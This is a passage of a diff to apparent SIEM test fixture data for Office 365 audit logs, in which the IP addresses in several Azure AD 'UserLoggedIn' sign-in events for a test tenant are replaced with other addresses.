"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3492,10 +3492,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:37", "ExtendedProperties": [ { 
@@ -3545,7 +3545,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3563,10 +3563,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-06T09:28:00", "ExtendedProperties": [ { 
@@ -3616,7 +3616,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3634,10 +3634,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:28:52", "ExtendedProperties": [ { 
@@ -3687,7 +3687,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3705,10 +3705,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:37", "ExtendedProperties": [ { 
@@ -3758,7 +3758,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3776,10 +3776,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:28:52", "ExtendedProperties": [ { 
@@ -3829,7 +3829,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3847,10 +3847,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:01", "ExtendedProperties": [ { 
@@ -3900,7 +3900,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -3918,10 +3918,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T10:53:12",
 "ExtendedProperties": [
 {
@@ -3971,7 +3971,7 @@
 },
 {
 "event": {
